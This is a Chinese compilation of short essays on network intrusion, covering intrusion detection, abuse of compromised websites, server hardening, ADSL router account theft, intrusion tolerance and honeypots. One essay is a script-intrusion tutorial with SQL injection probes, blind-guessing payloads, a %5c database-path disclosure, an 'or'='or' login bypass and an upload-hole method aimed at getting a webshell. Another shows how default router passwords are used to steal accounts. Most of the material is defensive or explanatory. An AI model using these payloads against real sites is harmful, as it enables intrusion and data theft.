安全入侵范文

安全入侵范文（精选12篇）

安全入侵 第1篇

传统的网络安全防护, 是以防火墙和杀毒软件为主体, 再加上身份认证机制等构建的防护体系, 这种方法对防止系统被非法入侵有一定的效果。但是某些入侵者会设法寻找防火墙背后可能敞开的通道对其进行攻击, 另一方面防火墙在防止网络内部袭击等方面收效甚微[1]。而且, 由于功能有限, 防火墙通常不能提供有效的入侵检测。因此, 要构建一个合格的网络安全保护体系, 光靠防火墙是远远不够的, 还需要有能够对网络进行实时监控、实时报警并且能够有效识别攻击手段的网络安全工具, 入侵检测系统 (IDS, Intrusion Detection System) 应运而生。入侵检测系统可通过对计算机网络或计算机系统中若干关键点的信息收集并对其进行分析, 发现网络或系统中违反安全策略的行为和攻击迹象, 产生报警, 从而有效防护网络的安全。入侵检测系统作为防火墙之后的有益补充, 有着不可替代的作用, 在网络安全防护中的地位也越来越突出[1]。作为一个全新、快速发展的领域, 有关入侵检测的研究已经成为网络安全中极为重要的一个课题。

1 研究现状

1.1 入侵检测现状

由于网络登陆国内相对较晚, 而且刚开始时人们对它的认识还不够, 所以普及面很窄。随着信息化进程不断推进, 人们对网络有了全新的认识, 越来越多的人在使用网络, 使得它成为人们生活的一部分。在人们对网络的优越性产生认可的同时, 安全问题不得不为人们所关注[11]。近几年, 国内的网络的发展速度是有目共睹的, 而对网络安全的研究也日益被重视。当然对入侵检测的研究也受到各方面的关注。但是由于一些客观原因, 同国外的差距还是很大。虽然一些网络安全公司也相继推出自己的入侵检测产品, 但是很多都是在借鉴国外的技术手段。另外, 国家对这方面研究的投入也在加大, 而且启动了信息安全的863紧急应急计划。各科研单位和大专院校都有从事这方面的研究和开发的队伍一总之, 国内的水平同国外的差距还是很大, 但是随着更多的人的关注和投入到这方面的研究, 相信在不久的将来, 国内的水平将赶超国外并占有领先位置的一席之地[11]。

1.2 基于人工免疫的入侵检测系统现状

1999年, Hunt等人提出了基于免疫网络的机制学习系统, 并应用于错误检测, Hunt等人通过模拟生物免疫系统的自学习、自组织机制, 提出一种人工免疫网络模型DB细胞网络及算法;

2000年, Deeastro建立了基于克隆选择算法和亲和力成熟的免疫系统, 该系统被证明是一个用进化策略来解决机器学习的问题, 并被应用于模式识别和多重动态优化等领域;

2002年, Kim针对不同的环境提出了动态的学习算法;

2003年, Dasgupta等人在异常检测方面提出了结合免疫学的不同特征生成多层免疫学习算法, 并提出一个基于免疫的入侵检测系统框架;

2004年, Stepney等人完善了整体免疫系统的概念发展;

2005年, Stibor等人解决了基于统计的异常检测问题;

2006年, Aichelin等人提出了应用于网络安全的危险理论;

2007年, Nanas等人提出了从进化算法到人工免疫系统的动态模拟优化;

2008年, Feixian Sun, Tao Li等人提出了基于动态的免疫异常检测方法, 有效的解决了训练集的选取问题, 提高了入侵检测的检测率和覆盖率, 降低了误报率。

2 入侵检测

2.1 入侵检测定义

入侵检测是指发现非授权用户企图使用计算机系统或合法用户滥用其特权的行为, 这些行为破坏了计算机系统的完整性、机密性及资源的可用性。为完成入侵检测任务而设计的计算机系统称为入侵检测系统。

一个成功的入侵检测系统至少要满足以下五个主要功能要求:实时性;可扩展性;适应性;安全性与可用性;有效性要求。

2.2 入侵检测分类

按入侵检测的方法来分类:误用检测;异常检测;混合检测;基于主机的入侵检测系统;基于网络的入侵检测;离线检测系统;在线检测系统。

2.3 入侵检测方法

异常检测方法:

基于异常发现的检测技术则是先定义一组系统“正常”情况的阈值, 如CPU利用率、内存利用率、文件校验和等 (这类数据可以人为定义, 也可以通过观察系统、并用统计的办法得出) , 然后将系统运行时的数值与所定义的“正常”情况比较, 得出是否有被攻击的迹象。这种检测方式的核心在于如何分析系统的运行情况。按照所使用的分析方法, 可以分为以下几种入侵检测系统:基于统计分析的异常检测方法;基于模式预测的异常检测方法;基于相似度实例的学习方法;基于神经网络的异常检测方法;基于规则的专家系统;着色Petri网;基于条件概率的误用入侵检测方法;基于键盘监控的入侵检测方法。

上述归结了所有方法, 每种方法都有自己的特性, 特点, 在不同情况发挥不同的作用。

3 结论

本文着重于论述了入侵检测的由来, 发展随着人工免疫方法的不断进步, 基于免疫的入侵检测这个难题相信很快就能解决。

摘要：本文详细论述了入侵检测的概念、种类、方法、发展。

关键词：入侵检测,安全性,入侵

参考文献

[1]陈进.基于免疫原理的网络入侵检测系统研究[D].武汉:华中科技大学, 2006.

[2]郭春阳.基于人工免疫的入侵检测方法研究[D].哈尔滨:哈尔滨工程大学, 2007.

网络安全：网站入侵透视 第2篇

网络已经成为我们日常生活中必不可少的一个部分，加之现今移动设备的快速增长，互联网已经成为年轻人另外一个重要的资源。然而在我们享受互联网技术带来的各种便利的时候，网络安全问题也日益成社会焦点。我们在日常生活中访问社交网络应用、购物网站，银行/电信/公共服务站点的时候，我们通常认为他们并不是会对我们产生危害的恶意网站，由此，我们认为这些网站对于我们相对安全，可以放心访问，但有没有考虑到这些网站可以信任吗?

在网络上Compromised Website 翻译为“被妥协掉”或者“被入侵”的网站，当一个网站被妥协掉了，那么意为着这个网站被入侵了。

为什么网络犯罪分子要去妥协(Compromise)一个网站，其目主要是利用这个网站在受众中的信誉来实现自己的犯罪目的，同时利用被妥协网站的CPU、网络带宽、托管资源等。

一 遭入侵的网站的利用价值

目前大多数针网站安全的网络安全工具通常依赖于已知含有恶意软件，网络钓鱼或垃圾邮件产品的数据库，其中也含有已知的可信任网站以及信誉机制以便对不明的网站进行评估。所以入侵一个已知的有着良好信誉的网站给网络犯罪分子提供了一个平台以准备相应的攻击/侵害活动，而不会被安全软件轻易封锁。此外，黑客也得到免费托管主机和所有相关的资源，如带宽和计算能力。由于这些原因，被妥协的网站对于犯罪分子传播恶意软件是非常有利用价值的，恶意人员通常努力找出系统漏洞，以导致数成百上千运行相同的软件的网站可以同样被妥协。以下对黑客利用被妥协网站进行恶意软件传播举几个例子。1 经由被妥协网站重定向

在垃圾邮件的侵害中，被妥协网站被广泛用来重定向用户访问。一旦网站遭到入侵，一个简单的HTML文件被置于“主题”目录下，并且该URL通过电子邮件发送给数以百万计的用户。HTML文件中包括简单的重定向代码和一个普通的消息。当用户打开垃圾邮件，发现一个信誉良好网站的连接，用户就有可能点击邮件中的URL，而实际上却由被妥协网站重定向到其他有目的的问题网站，从而达到网络犯罪分子的目的。在这种情况下，该网站仍然正常运作，因此不会对网站所有者提出立即的警告信息以发现该网站正在协助在垃圾邮件广告的分发。利用图片管理器漏洞

很多网站都使用了一个名为“phpThumb”脚本来管理他们网页中的图片。该脚本可以让网页设计者调整图像大小，添加水印以及执行时其他图片相关的动作。PhpThumb包含一个已知漏洞，它允许攻击者在目标网站上运行他们所希望任何代码。

在过去的攻击行为中，黑客经常大量使用phpThumb漏洞进行攻击，包括利用被妥协网站发送大量的垃圾邮件和网络钓鱼邮件。在垃圾邮件攻击情况下，攻击者在phpThumb目录中安装一个电子邮件发送程序。插入的代码发送垃圾邮件/网络钓鱼邮件，该网站则继续正常工作，但实际上该网站良好声誉被滥用，并用来发送垃圾邮件和网络钓鱼邮件。

二 被入侵网站的研究那种网站软件是侵害目标

网站黑客是否针对特定网站建设软件?，是否有某种内容管理系统(CMS)，比其他的更脆弱?经过相关调查揭示，WordPress最受黑客喜爱，原因可能在于WordPress是最常用的开源网站内容管理软件，此外，WordPress有非常强大的插件资源，在许多情况下，这些插件中的安全漏洞是被妥协网站上的攻击媒介。需要关注的是很多网站拥有者并不知道自己所使用的网站内容管理软件，如何加强威胁管理更无从谈起。网站如何被侵害

恶意黑客一直在寻找新的缺陷，漏洞和社交工程技巧，让他们入侵网站。从这方面考虑，大多数网站所有者不知道他们的网站遭到入侵并不奇怪，有数据表明63%的网站所有者不知道他们的网站遭到入侵。20%的网站拥有者未能及时更新网站软件和插件，任由他们的网站受到攻击。通过公共电脑或WiFi接入从图书馆的电脑或机场的休息室进行网站维护管理是不安全的，容易发生密码失窃情况，而在共享服务器进行托管的网站也有面临托管系统遭入侵而导致所有运行在其上的网站被妥协。被入侵网站被用来做什么

正如文章前面所述，被妥协网站提供了一个平台，使得黑客可以从事一系列的非法活动，这些活动包括：

Ø 托管恶意软件

这一方法可以利用复杂的脚本感染任何访问网站的客户端。此外，精心设计的电子邮件可以欺骗收件人下载被入侵网站上的恶意软件。

Ø URL重定向

很多被妥协网站可能会进行一个简单的重定向到一些最终的恶意网站，这只需通过几行

隐藏在被妥协网站中的HTML代码，迫使该网站作为一个前门到含有垃圾邮件的产品页面或恶意软件的达恶意网站。

Ø 托管网络钓鱼，垃圾邮件的网页，色情网站

在被妥协网站中的嵌入一两个静态页面包含做广告的垃圾邮件的产品，如药品非法销售商品等，以作为银行，第三方支付，公共邮箱的钓鱼页面。

Ø 破坏

被妥协网站的目的可能是为了嘲弄某个网站所有者，或者表达政治观点——通常被认为是 “黑客行动主义”，有的时候也有可能是竞争对手的破会行为。

Ø 其他的内容或行为

一些相当复杂形式的网站滥用也已经发生过。

一部分获知网站被入侵的网站拥有者不知道他们的网站被用来做什么，一部分网站拥有者道他们的网站被用来承载恶意软件，重定向到恶意网址，恶意软件传播到其他合法网站等等。如何察觉意识到网站被妥协

极少情况下，网站被破坏，网站遭到攻击显而易见。在大多数情况下，攻击者需要的资源和网站的信誉来实现他们的目的，所以网站被入侵不会那么明显。那么如何获知网站被妥协，事实证明，在将近一半的的情况下，业主们通过浏览器，搜索引擎或其他试图访问自己的网站就可以获得警示提醒。

另外，同事，朋友，网络托管提供商，或者安全组也可以提醒网站出现的问题。值得注意的是，只有少数网站能够通过增加的活动链接与异常行为来探查到问题。这反映了恶意人员希望被妥协网站尽量保持静默不被发现，被妥协行为隐藏的越久，利用被妥协的合法网站进行的破会就越大。不要等到网站被锁定后才察觉问题所在。如何重新获得网站控制权

在确定网站已经被入侵后，可以求助专业安全服务来解决问题，此外从备份中恢复，重新安装受感染的插件或手动删除恶意文件和脚本，都可以恢复正常的网站系统。但重新获得控制权的网站任然面临被再次攻破的风险，关键的是要知道黑客利用系统中何种漏洞进行入侵，并通过不断地更新补丁来降低风险。

三 阻止网站被入侵

很多网站的建设者似乎没有考虑到自己的网站会被入侵，并且并不知道如何清理他们的网站并保持网站的安全。软件的漏洞，被盗的密码，病毒等通常的攻击媒介，都是网站被妥

些的途径，可以通过以下基本技巧降低网站被入侵的风险：

Ø 保持软件和所有插件更新。无论运行通用的网站内容管理软件还是自己开发的软件，确保软件和所有第三方插件以及扩展部件保持更新。定期清理和删除不再使用的插件或其他附加软件。

Ø 使用高强度，多样化的密码。

Ø 定期扫描系统中是否存在恶意软件。

Ø 在Web服务器中使用相应的文件权限

Ø 研究并选择虚拟主机提供商，并进行安全优选。如果你觉得其提供的安全防护能力不足，可以考虑使用从虚拟主机提供商或第三方安全服务提供商获得附加安全服务

四 结论

合法网站是网络罪犯有价值的可利用资源，通过对这些网站的滥用会影响网站的拥有者以及更高的安全性的生态系统，造成网络信任体系的崩溃。

网站黑客的受害者

首先，许多消费者和小型企业网站所有者缺乏对网站威胁的意识，以及在网站已经被入侵的情况下如何获得帮助。通过浏览器和搜索引擎的警告可以提供一种方法使得该网站管理者了解他们的网站已经被黑客入侵，但这也表明了这类网站需要在主动探查黑客攻击方面有所改进。

网站托管服务提供商

这些提供商比一般消费者和小型企业在网络安全方面拥有更多的资源，在认知和整治方面需要发挥更大的作用，特别是租用虚拟主机服务的使用者需要从他们的供应商方面寻求援助解决安全问题。托管服务提供商需要加强自身系统及支撑生态系统的安全性，并通过自身防范，培训，支持来保护他们的客户。

服务器安全管理与入侵防护浅析 第3篇

关键词:信息安全 入侵 防御 数据恢复

中图分类号:G647文献标识码:A文章编号:1673-9795(2012)04(a)-0222-01

近年来,计算机普及、Internet迅猛发展,信息系统已在各行各业普及使用,人们在利用网络的优越性的同时,对网络安全尤其是web服务器的安全问题不容忽视,如何设置使得web服务器承载的网站在网络中较为安全的运行,需要我们不断地深入研究。本文以Windows server 2000/2003 web服务器安全设置为例,就本人对Web服务器的应用经验,针对黑客的攻击入口及该注意的安全设置,本着最少开启的服务设置最小的权限尽量获得相对安全的原则进行探讨剖析。

1 安全配置,防范于未然

目前主流服务器多采用windows 2000/2003、linux操作系统,其中linux系统安全稳定,多用于核心数据管理、email、ftp等相关服务,windows具有简洁易行等优势,所以仍被广泛应用。但系统往往因为存在漏洞、端口等,给入侵者提供机会,对稳定的安全管理构成威胁,所以首先要构建安全的服务系统。

1.1 系统配置

做好系统升级、操作系统补丁更新,特别是IIS 6.0补丁、SQL SP3a补丁、IE 6.0补丁等。开启系统自带防火墙,停掉Guest 帐号、并给guest加一个复杂的密码,隐藏重要文件/目录,禁用DCOM。

1.2 端口服务设置

关闭不需要的端口。只开启3389、21、80、1433,办法:本地连接—属性—Internet协议(TCP/IP)—高级—选项—TCP/IP筛选--属性—勾选,然后添加需要的端口即可,设置完端口重启系统。

关闭不需要的服务,打开相应的审核策略。把不必要的服务,如Remote Registry等都禁止掉,减少隐患。

在运行中输入gpedit.msc回车,打开组策略编辑器,配置需要审核的项目:账户登录事件、策略更改等。

1.3 磁盘权限设置

C盘只授予administrators和system权限,Windows目录要加上users的默認权限,否则ASP和ASPX等应用程序无法运行。关闭默认共享的空连接,防止SYN洪水攻击。

1.4 安装杀毒软件、防火墙,做好补丁操作和病毒库升级

1.5 SQL2000安全配置

System Administrators角色不超过两个;如果本机最好将身份验证配置为Win登陆;不使用Sa账户,为其配置一个超级复杂的密码;隐藏SQL Server、更改默认的1433端口;为数据库建立一个新的角色,禁止该角色对系统表的select等权限,防止sql注入时利用系统表。

1.6 IIS安全设置

不使用默认的Web站点,如果使用也要将IIS目录与系统磁盘分开;删除IIS默认创建的Inetpub目录(在安装系统的盘上);删除系统盘下的虚拟目录;删除不必要的IIS扩展名映射;更改IIS日志的路径。

2 入侵防御,安全排查

攻击者入侵某个系统,总是由某个主要目的所驱使的。例如炫耀技术,得到机密数据,破坏企业正常的业务流程等等,攻击者入侵系统的目的不同,使用的攻击方法也会不同,所造成的影响范围和损失也就不会相同。因此,在处理不同的系统入侵事件时,就应当对症下药,不同的系统入侵类型,应当以不同的处理方法来解决,这样,才有可能做到有的放矢,达到最佳的处理效果。

2.1 入侵检测

服务器被攻击时,一般通过几个方面体现:

web页面—主页文件丢失或被篡改,页面上出现乱码或广告信息,主页上关链接错误,弹出删改信息。

流量异常—网络带宽沾满,流量突增,不断有发包、收包操作。

服务器端查看—会有异常访问,增加的用户等入侵痕迹。

根据日常管理经验,入侵途径主要集中在以下几种:

系统未能及时升级,补丁操作。

开启web、ftp等相关服务,用户权限设置不明确。

页面上有用户登陆设置,通过数据库接口进入。

2.2 解决办法

确定系统入侵,应采取及时有效的措施:

首先,要通过抓图、保存页面、建立入侵系统快照等方式取证,以便事后分析和留作证据。

其次,立即通过备份恢复被修改的网页。

之后,在Windows系统下,通过网络监控软件或“netstat -an”命令来查看系统目前的网络连接情况,如果发现异常,应当立即断开连接。然后通过查看系统进程、服务和分析系统和服务的日志文件,来检查攻击者做了哪些操作,相应恢复。

通过分析系统日志文件,了解攻击者入侵系统所利用的漏洞,寻找相应的补丁修补,如果目前还没有这些漏洞的相关补丁,应当使用其它的手段来暂时防范再次入侵。

最后,使用系统或相应的应用程序检测软件对系统或服务进行一次彻底的弱点检测,在检测之前要确保其检测特征库是最新的。所有工作完成后,在后续的一段时间内,应当安排专人对此系统进行实时监控,以确信系统已经不会再次被此类入侵事件攻击。

2.3 巩固恢复成效

系统恢复后,要做一些后续工作来巩固和保障日后的管理和使用:

修改:系统管理员及其它用户名称和登录密码;

修改数据库及其它应用程序的管理员账户和登录密码;

修改系统中所有与网络操作相关的帐户名称和登录密码。

重设:用户权限、文件访问控制规则、数据库访问控制规则。

更新:防火墙规则、杀毒软件和IDS/IPS,分别更新病毒库和攻击特征库。

完成所有系统恢复和修补任务后,进行一次完全备份,并且将新的备份与旧的分开保存。

3 结语

随着网络飞速发展及B／S服务业务的广泛应用,服务器的安全问题不容忽略,本文结合工作实际,分析了Web服务器的入侵方式,给出了服务器安全防护的应对策略,但是安全防护与入侵之间的矛盾是永远存在的,在日后的管理维护工作中仍需进一步完善。

参考文献

[1]黄景华.浅谈Web服务器入侵与安全防护[J].电脑知识与技术,2011(1):29～30.

[2]林豪彪.学校Web服务器安全配置的初探[J].科技信息,2009(21):78～79.

[3]王继龙.常见Web应用安全漏洞及应对策略[J].中国教育网络,2007(8):75～75.

网络安全之脚本入侵 第4篇

关键词：脚本入侵,SQL注入,暴库,万能密码,上传漏洞

1、引言

网站入侵是一种极为常见也是利用率极高的手段。一般针对服务器只开80端口的主机使用脚本入侵，而作为服务器，80端口是必须开放的，因为它是用于http协议的，包括SQL注入，暴库，万能密码，上传漏洞，XSS跨站脚本攻击。提权后进一步渗透控制整个服务器。

1.1. SQL注入

就是利用某些数据库的外部接口，把用户数据插入到实际数据库操作语句中，从而达到入侵的目的。

1.2. SQL过程

首先用domain3.5扫描目标站点http://127.0.0.1，返回结果提示http://127.0.0.1/main.asp?id=1存在SQL注入漏洞。接下来右键点击"检测注入"，开始SQL注入猜解检测，得到数据库表名，列名和后台用户名，密码。扫后台地址，一般为"manage/login.asp"。最终目的就是登入后台，传马，提权，获得Webshell。

可见大部分的操作都是需要去猜解的，所以即使程序存在SQL注入漏洞，也不一定能入侵，只要把一些关键词改得稀奇古怪些或者对路径进行加密处理，就对攻击者来说提高难度。

原理分析：

(1) 判断该站有无注入漏洞，假设URL漏洞如下：http://127.0.0.1/main.asp?id=1, 则构造数据库原型查询语句为：

select*from表名where id=1 and[查询语句]。

所以我们可以通过以下方式检测有无SQL注入漏洞:

1.http://127.0.0.1/main.asp?id=1'

2.http://127.0.0.1/main.asp?id=1 and 1=1

3.http://127.0.0.1/main.asp?id=1 and 1=2

这三句URL的数据库原型为:

1.select*from表名where id=1'

2.select*from表名where id=1 and 1=1

3.select*from表名where id=1 and 1=2

第1句返回错误，说明可能存在SQL注入漏洞，2和3则是进一步说明SQL漏洞的存在。第3句和原句相同，第4句若返回错误，则一定存在该漏洞。

如图1所示就是ecshop系统，一个典型的处在SQL注入的网上书店系统。

(2) 手工猜解

猜解数据库名，and (Select Count (*) from数据库名) >0

猜字段，and (Select Count (字段名) from数据库名) >0猜字段中的记录长度，and (select top 1 len (字段名from数据库名) >0

猜字段的ASCII值（access）, and (select top 1 asc (mid (字段名, 1, 1) ) from数据库名) >0，得到后台地址的用户名和密码。

2、暴库

暴库就是把对方的数据库路径暴露出来，下载下来，原因是没有在数据库连接中加入容错代码导致的，也称%5c暴库法。为什么说是%5c呢？那是因为%5c在计算机里是""的十六进制代码。而""和"/"在IIS中代表不同的意义，""是服务器的真实路径，"/"则是虚拟路径，这是为了保证服务器的安全，即IIS为了不让访问者知道真实的路径，并确保网站不因变换地址而影响使用采取的措施。

假设网站的路径为http://127.0.0.1/down/view.asp在地址栏里把"/down/"改为"/down%5c"，即http://127.00.1/down%5cview.asp, IIS以为到了根目录所在的物理路径，不再解析下去。

则返回结果：

Microsoft JET Database Engine (0x80004005)

C：\Inetpubwwwrootdbadmin.mdb不是一个有效的路径。

这样就调用了一个新的数据库链接，而C：\Inetpubwwwrootdbadmin.mdb这个路径是不存在的。真实的物理路径=根目录物理地址（C：\Inetpubwwwroot）+down+相当路径 (dbadmin.mdb) ，所以暴出来了。

3．经典万能密码

在网站后台地址处有管理员的用户名和密码两个表单，用户输入用户名和密码后，表单会把用户名和密码提交到数据库里，查询是否存在与之相对应的用户名和密码。当两者同时存在，则返回正常。

万能密码'or'='or'中，or只要一个为真，就为真，所以'or'='or'恒成立，这样就可以绕过后台验证。接下来就是提权拿站的事了。

至于后台地址的寻找，我们可以通过百度，谷歌来搜索，在搜索栏里输入相关的关键字，比如site:www xxx.com管理中心。

4. 上传漏洞

以前动网先锋6.0存在严重的上传漏洞。具体方法假设在IE输入http127.0.0.1/upfile.asp, 返回为：请先选择你要上传的文件[重新上传]，如图2所示，说明存在上传漏洞。

返回空白或显示请先登入后上传，则说明没有该漏洞。总之就是从该站找到一个可以上传文件的路径，从而绕过后台地址，获得一定权限，如图3所示

5、结论

脚本入侵只是一种从网站程序入手的攻击方式。此外还有针对服务器系统入手的攻击手段，比如NT-server和FTP弱口令以及系统所开放的服务和端口。所谓"知己知彼，百战不殆"，了解怎么攻击的同时也就知道怎么建立更安全的防御体系。

网络安全是保证Internet健康发展的基础，是保证企业信息系统正常运行，保护国家信息基础设施成功建设的关键。

参考文献

[1]逍遥.网站入侵与脚本攻防修炼[M].北京:电子工业出版社, 2008:56-60.

防止ADSL被入侵的安全问题 第5篇

许多网友都有过ADSL帐号被盗的经历，特别是你的宽带业务限时、限量时，无端端的就损失了不少的金钱，有时甚至在月底的时候支付了高昂的上网费用。

很多ADSL用户往往用路由的方式来共享宽带资源，对于大多数的普通用户来说，只要路由设置完毕，局域网内的机器能上网了，就认为万事OK了，其实事实远非如此。

黑客凭借简单工具就可以轻易地突破您的路由器，入侵您的局域网、盗取您的帐户密码，从而为您带来不可估量的损失。

那么应该如何保护自己的帐号不让别人轻易的盗取呢?我们就从黑客的入侵手段来制定防御策略。

通常黑客都是利用IP扫描工具扫描一个ADSL网段，从结果中获取哪个IP地址是可以连接的，之后再扫描80端口，就可以获得已经开放了80端口的计算机。再80端口信息中能得到该80端口是由什么程序开放的。黑客就可以根据经验来判断哪个是ASDL路由器，通过IE浏览器就能登录到该路由器。

这时就出现另一个问题了，登录路由器需要提供用户名和密码，黑客如何知道的。实际上这里就是非常关键的一步了，许多网友在购买路由器后直接接上网线就使用，根本不在意登录用户名和密码。这时黑客就可以完全利用路由器默认的用户名密码登录到路由器。

至此黑客就完全得到了路由器的控制权，然后进入ADSL帐号设置界面，通过查看此网页的源代码就能轻松的得到ADSL账户的用户名和密码。

所以，盗号是否成功的关键就是路由器的登录用户名和密码。用户在购买路由器后一定要修改用户名和密码，至少要修改用户名。那么就是说修改了密码就安全了?非也。黑客还能用密码破解器来暴力破解你的密码，所以在修改密码时一定要设置一个比较复杂的组合密码，比如英文加数字再加逗号、点、杠之类的特殊符号。只要不让黑客登录到你的路由器，他就没法轻松的获取你的ADSL帐号。

除此之外，黑客还能利用路由器入侵到你的计算机，只要控制了路由器，你的计算机基本就等于暴露给他了。

那么我们还要在计算机上做一些相应的安全措施，防止个人资料流入黑客的手里。

1.取消文件夹隐藏共享

在默认状态下，Windows /XP会开启所有分区的隐藏共享，从“控制面板/管理工具/计算机管理”窗口下选择“系统工具/共享文件夹/共享”，就可以看到硬盘上的每个分区名后面都加了一个“$”。但是只要键入“计算机名或者IPC$”，系统就会询问用户名和密码，遗憾的是，大多数个人用户系统 Administrator的密码都为空，入侵者可以轻易看到C盘的内容，这就给网络安全带来了极大的隐患。

怎么来消除默认共享呢?方法很简单，打开注册表编辑器，进入“HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Sevices/

Lanmanworkstation/parameters”，新建一个名为“AutoShareWKs”的双字节值 ，并将其值设为“0”，然后重新启动电脑，这样共享就取消了。

2.关闭不必要的端口

黑客在入侵时常常会扫描你的计算机端口，如果安装了端口监视程序，该监视程序则会有警告提示。如果遇到这种入侵， 可用工具软件关闭用不到的端口，其他一些不常用的端口也可关闭。

3.更换管理员帐户

道理和路由器登录用户一样，黑客想要控制你的计算机，必须得到管理员权限的帐号。通常用户使用电脑时都是用administrator登录，如果将administrator禁用，并建立一个其他名称的管理员帐号，黑客就没那么容易入侵你的电脑，因为黑客是不能通过普通手段获取管理员帐号名称的。

4.Guest帐户的入侵

Guest帐户即所谓的来宾帐户，它可以访问计算机，但受到限制。不幸的是，Guest也为黑客入侵打开了方便之门!网上有很多文章中都介绍过如何利用Guest用户得到管理员权限的方法，所以要杜绝基于Guest帐户的系统入侵。

安全入侵 第6篇

关键词入侵容忍；网络安全；技术

中图分类号TP文献标识码A文章编号1673-9671-(2011)021-0109-01

随着网络上各种新业务的兴起，信息技术与信息产业已成为当今世界经济与社会发展的主要驱动力。然而，在网络这个不断更新换代的世界里，安全漏洞却无处不在。即便旧的安全漏洞补上了，新的安全漏洞又将不断涌现。网络攻击正是利用这些存在的漏洞和安全缺陷对系统和资源进行攻击。全世界每年由于信息系统的脆弱性而导致的经济损失逐年上升，安全问题日益严重。而第一代信息安全技术以“防”为主，但不能阻止非法入侵。第二代信息安全技术以入侵检测系统为代表，在阻止不了敌人的情况下，以发现敌人或破坏结果为目标，但随着新的攻击技术不断出现，很难发现所有的攻击行为。因此，第三代信息安全技术入侵容忍技术应运而生。所谓入侵容忍技术就是认同安全问题的不可避免性，针对安全问题，不再将消除或者防堵作为第一重点，而是把目光焦聚到如何在攻击之下系统仍能提供正常的或者降级服务这一点上。入侵容忍系统以攻击者即使攻破了系统中的多个组件，也不会危害整个系统的安全和主要服务质量为目标，同时能迅速恢复入侵所造成的损害。

1入侵容忍技术的特点

入侵容忍系统要求系统具有耐攻击的可操作性，当系统遭受攻击或入侵时，仍然能够连续地提供所期望的服务。因此，入侵容忍必须具有以下：1）自我诊断能力。通过触发器检测到局部系统的失效，然后调整系统结构，重新分配资源，从而达到继续服务的目的。2）故障隔离能力。针对被隔离的数据和操作，当判决系统认为确实是攻击时，就将被隔离的操作删除掉。当判定不是攻击时，就将这些隔离的内容融合到正确的系统中去。3）还原重构能力。具有入侵容忍能力的系统必须修正所有被攻击影响到的数据，但又不能采用简单的回退恢复。

2入侵容忍技术在企业网络安全中的应用

一个入侵容忍系统有以下几个基本功能模块：1）服务监视模块：模拟用户服务，向用户发送某些特定的测试信号，检验受保护服务器的工作状态是否正常。 2）服务代理模块：服务代理模块主要起防护系统的作用，服务代理可以是简单的防火墙或入侵检测系统，在过滤大量可以被简单检测出的恶意行为的同时，确保控制模块只需处理真正威胁到服务的攻击。3）系统控制模块：主要设定安全策略，并有选择地提取信息。4）分析模块：完成对数据的分析，总结各个单元的运行数据。如采用数据挖掘等方法来完成分析任务，一旦发现异常特征的数据或异常模式会通知系统控制模块。5）策略执行模块：完成清除、恢复和屏蔽步骤并执行系统控制模块送出的安全策略。系统状态可以分为正常、退化和受攻击状态。6）系统备份模块：原有系统的组成部分。比如采用冗余服务器来保证容错，或者采用多种系统结构来增强整体系统的健壮性。

下图根据入侵容忍系统的实现方式和形式不同，将上述各模块中的多个模块合并设计，大部分入侵容忍系统都需要完成这些功能，才能够独立提高系统的安全性能，具体划分和转换过程如下：1）正常状态：系统能够安全并正常运行的状态，即没有检测到任何可疑的故障/入侵。2）易受攻击状态:即系统己经检测到存在某些可疑的故障入侵，但还不能确认是否为真正的网络攻击或系统故障，在这个状态下系统不采取较强的响应措施，只是通过状态转移控制模块延迟相关服务对象请求的处理或资源分配的限制。3）服务退化状态:服务器的服务功能受到较大影响，服务器处理响应延迟明显加大，并由状态转移控制模块把可疑服务（请求）迁移分配到同一台服务器上，进行服务隔离。4）被攻击状态:状态转移控制模块根据表决管理器或其它模块提供的分析结果，确认可疑服务属于某种故障，系统进入被攻击状态。此时，复制管理器从对象组中删除有故障的复制品，切断有故障请求与服务器的连接。

3结语

总的来说，网络安全技术是个很重要的方面，就目前防范技术的发展来看，开发新的安全网络体系结构、高性能的安全产品（防火墙、入侵检测系统等）、新的网络安全协议等是未来的发展方向。特别要提出的是，为了网络信息的安全，加密技术是一个重要角色，它在未来网络安全保卫战中的地位会越来越重要。

参考文献

[1]孙晶茹,董晓梅.于戈.分布式入侵检测中的报警关联方法评述.计算机工程.2005,31:7.

[2]鲍旭华,戴英侠,等.基于入侵意图的复合攻击检测和预测算法.软件学报.2005,16:l2.

入侵诱骗技术在网络安全的应用 第7篇

一、入侵诱骗技术简介

通过多年的研究表明, 网络安全存在的最大问题就是目前采用的被动防护方式, 该方式只能被动的应对攻击, 缺乏主动防护的功能。为应对这一问题, 就提出了入侵诱骗技术。该技术是对被动防护的扩展, 通过积极的进行入侵检测, 并实时的将可疑目标引向自身, 导致攻击失效, 从而有效的保护目标。

上个世纪80年代末期由stoll首先提出该思想。到上世纪90年代初期由Bill Cheswish进一步丰富了该思想。他通过在空闲的端口上设置一些用于吸引入侵者的伪造服务来获取入侵者的信息, 从而研究入侵者的规律。到1996年Fred Cohen提出将防火墙技术应用于入侵诱骗技术中, 实现消除入侵资源。为进一步吸引入侵目标, 在研究中提出了引诱其攻击自身的特殊目标“蜜罐”。研究者通过对蜜罐中目标的观察, 可清晰的了解入侵的方法以及自身系统的漏洞, 从而提升系统的安全防护水平。

二、蜜罐系统的研究

在这个入侵诱骗技术中, 蜜罐的设计是关键。按交互级别, 可对蜜罐进行分类:低交互度蜜罐、中交互度蜜罐和高交互度蜜罐。低交互度蜜罐由于简单的设计和基本的功能, 低交互度的honeypot通常是最容易安装、部署和维护的。在该系统中, 由于没有真正的操作系统可供攻击者远程登录, 操作系统所带来的复杂性被削弱了, 所以它所带来的风险是最小的。但也让我们无法观察一个攻击者与系统交互信息的整个过程。它主要用于检测。通过中交互度蜜罐可以获得更多有用的信息, 同时能做出响应, 是仍然没有为攻击者提供一个可使用的操作系统。部署和维护中交互度的蜜罐是一个更为复杂的过程。高交互度蜜罐的主要特点是提供了一个真实的操作系统。该系统能够收集更多的信息、吸引更多的入侵行为。

